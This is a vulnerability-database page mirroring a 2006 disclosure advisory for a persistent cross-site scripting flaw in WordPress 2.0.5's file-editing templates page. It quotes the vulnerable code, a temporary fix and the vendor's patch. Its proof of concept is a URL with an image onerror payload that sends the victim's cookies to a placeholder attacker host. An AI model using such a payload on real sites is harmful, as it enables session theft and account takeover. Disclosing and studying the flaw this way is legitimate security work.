Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

wp205-xss.txt

🗓️ 28 Dec 2006 00:00:00Reported by David KierznowskiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

WordPress Persistent XSS vulnerability in v2.0.

Code
`  
  
Vulnerability Title: WordPress Persistent XSS  
Author: David Kierznowski  
Homepage: http://michaeldaw.org  
Software Vendor: WordPress Persistent XSS  
Versions affected: Confirmed in v2.0.5 (latest)  
  
WordPress is a popular open source blogging software.  
A persistent XSS vulnerability has been found in WordPress (to be honest I have found a few problems and hope to publish these soon). This issue affects the latest version v2.0.5.  
  
Discussion:  
When editing files a shortcut is created titled recently accessed files. The anchor tag text is correctly escaped with wp_specialchars(); however, the link title is not sanitised. Instead, it is passed to get_file_description($file). The only restriction or limitation here is that our text is passed through basename. This means standard script tags will fail when ending with /. We can get around this by using open IMG tags; this works under FF and IE.  
  
Vulnerable code:  
wp-admin/templates.php:  
  
[line 22]$recents = get_option('recently_edited');  
[line 72]update_recently_edited($file);  
[Line 116]:foreach ($recents as $recent) :  
echo "<li><a href='templates.php?file="  
. wp_specialchars($recent, true) . "'>"  
. get_file_description(basename($recent))  
. "</a></li>";  
  
Vulnerable function:  
  
function get_file_description($file) {  
global $wp_file_descriptions;  
  
if (isset ($wp_file_descriptions[basename($file)])) {  
return $wp_file_descriptions[basename($file)];  
}  
elseif (file_exists(ABSPATH.$file)) {  
$template_data = implode('', file(ABSPATH.$file));  
if (preg_match("|Template Name:(.*)|i",  
$template_data, $name))  
return $name[1];  
}  
return basename($file);  
}  
  
Proof of concept:  
  
https://blogsite/wp/wp-admin/templates.php?file=<img src=""  
onerror=javascript:document.location.href=  
'http://evilhacker/capturecookie.php?'+document.cookie;>  
  
Temp Fix:  
Comment out the following line in wp-admin/templates.php  
[Line 72] update_recently_edited($file);  
  
WordPress was contacted: 26/12/06 22:04 BST  
Reply received: 27/12/06 06:11 BST  
WordPress has fixed this for v2.0.6 and a patch has been released  
for v2.0.5, see  
http://trac.wordpress.org/changeset/4665  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Dec 2006 00:00Current
7.4High risk
Vulners AI Score7.4
wordpresspersistent xssvulnerabilityv2.0.5securitypatchblogging softwarefile editingsanitisationcode injection
19